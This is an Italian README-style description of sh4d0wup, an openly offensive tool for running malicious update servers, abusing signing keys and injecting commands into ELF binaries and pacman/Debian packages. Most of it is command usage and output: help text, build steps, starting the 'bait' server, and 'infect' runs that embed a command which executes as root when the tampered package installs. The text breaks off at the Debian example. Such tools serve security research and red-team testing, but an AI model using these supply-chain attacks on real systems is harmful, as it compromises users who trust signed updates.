
Framework per l'abuso di chiavi di firma e lo sfruttamento degli aggiornamenti
% docker run -it --rm ghcr.io/kpcyrd/sh4d0wup:edge -h
Usage: sh4d0wup [OPTIONS] <COMMAND>
Commands:
bait Start a malicious update server
front Bind a http/https server but forward everything unmodified
infect High level tampering, inject additional commands into a package
tamper Low level tampering, patch a package database to add malicious packages, cause updates or influence dependency resolution
keygen Generate signing keys with the given parameters
sign Use signing keys to generate signatures
hsm Interact with hardware signing keys
build Compile an attack based on a plot
check Check if the plot can still execute correctly against the configured image
req Emulate a http request to test routing and selectors
completions Generate shell completions
help Print this message or the help of the given subcommand(s)
Options:
-v, --verbose... Increase logging output (can be used multiple times)
-q, --quiet... Reduce logging output (can be used multiple times)
-h, --help Print help information
-V, --version Print version information
Ti sei mai chiesto se l'aggiornamento che hai scaricato è lo stesso che ricevono tutti gli altri o ne hai ottenuto uno diverso fatto apposta per te? Gli aggiornamenti ombra sono aggiornamenti che ufficialmente non esistono ma portano firme valide e verrebbero accettati dai client come genuini. Questo può accadere se la chiave di firma viene compromessa dagli hacker o se un ingegnere del rilascio con accesso legittimo si fa corrotto.
sh4d0wup è un server di aggiornamento http/https malevolo che agisce come un proxy inverso di fronte a un server legittimo e può infettare e firmare vari formati di artefatti. Gli attacchi sono configurati in plot (trame) che descrivono come funziona il routing delle richieste http, come gli artefatti vengono modificati/generati, come devono essere firmati e con quale chiave. Una rotta può avere selettori in modo che corrisponda solo se, ad es., lo user-agent corrisponde a un pattern o se il client si connette da un indirizzo IP specifico. Per sviluppo e test, è possibile generare chiavi/certificati di firma fittizi e contrassegnarli come fidati.
C'è un binario precompilato nel repository [extra] di Arch Linux. Per compilare il binario dal sorgente su un sistema basato su Debian usa questo (testato con Ubuntu 22.04):
apt-get install curl git build-essential clang pkg-config libssl-dev libzstd-dev libpcsclite-dev liblzma-dev
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y
source "$HOME/.cargo/env"
git clone https://github.com/kpcyrd/sh4d0wup
cd sh4d0wup
cargo build --release
sudo cp ./target/release/sh4d0wup /usr/bin
sh4d0wup --help
Alcuni plot sono più complessi da preparare di altri, per evitare lunghi tempi di avvio dovuti a download e modifica degli artefatti, puoi compilare un plot in anticipo. Questo permette anche di creare firme in anticipo.
sh4d0wup build ./contrib/plot-hello-world.yaml -o ./plot.tar.zst
Questo avvia un server di aggiornamento http malevolo secondo il plot. Accetta anche file yaml ma potrebbero impiegare più tempo per avviarsi.
sh4d0wup bait -B 0.0.0.0:1337 ./plot.tar.zst
Puoi trovare esempi qui:
contrib/plot-archlinux.yamlcontrib/plot-debian.yamlcontrib/plot-rustup.yamlcontrib/plot-curl-sh.yamlsh4d0wup infect elf% sh4d0wup infect elf /usr/bin/sh4d0wup -c id a.out
[2022-12-19T23:50:52Z INFO sh4d0wup::infect::elf] Spawning C compiler...
[2022-12-19T23:50:52Z INFO sh4d0wup::infect::elf] Generating source code...
[2022-12-19T23:50:57Z INFO sh4d0wup::infect::elf] Waiting for compile to finish...
[2022-12-19T23:51:01Z INFO sh4d0wup::infect::elf] Successfully generated binary
% ./a.out help
uid=1000(user) gid=1000(user) groups=1000(user),212(rebuilderd),973(docker),998(wheel)
Usage: a.out [OPTIONS] <COMMAND>
Commands:
bait Start a malicious update server
infect High level tampering, inject additional commands into a package
tamper Low level tampering, patch a package database to add malicious packages, cause updates or influence dependency resolution
keygen Generate signing keys with the given parameters
sign Use signing keys to generate signatures
hsm Interact with hardware signing keys
build Compile an attack based on a plot
check Check if the plot can still execute correctly against the configured image
completions Generate shell completions
help Print this message or the help of the given subcommand(s)
Options:
-v, --verbose... Turn debugging information on
-h, --help Print help information
sh4d0wup infect pacman% sh4d0wup infect pacman --set 'pkgver=0.2.0-2' /var/cache/pacman/pkg/sh4d0wup-0.2.0-1-x86_64.pkg.tar.zst -c id sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
[2022-12-09T16:08:11Z INFO sh4d0wup::infect::pacman] This package has no install hook, adding one from scratch...
% sudo pacman -U sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
loading packages...
resolving dependencies...
looking for conflicting packages...
Packages (1) sh4d0wup-0.2.0-2
Total Installed Size: 13.36 MiB
Net Upgrade Size: 0.00 MiB
:: Proceed with installation? [Y/n]
(1/1) checking keys in keyring [#######################################] 100%
(1/1) checking package integrity [#######################################] 100%
(1/1) loading package files [#######################################] 100%
(1/1) checking for file conflicts [#######################################] 100%
(1/1) checking available disk space [#######################################] 100%
:: Processing package changes...
(1/1) upgrading sh4d0wup [#######################################] 100%
uid=0(root) gid=0(root) groups=0(root)
:: Running post-transaction hooks...
(1/2) Arming ConditionNeedsUpdate...
(2/2) Notifying arch-audit-gtk
sh4d0wup infect deb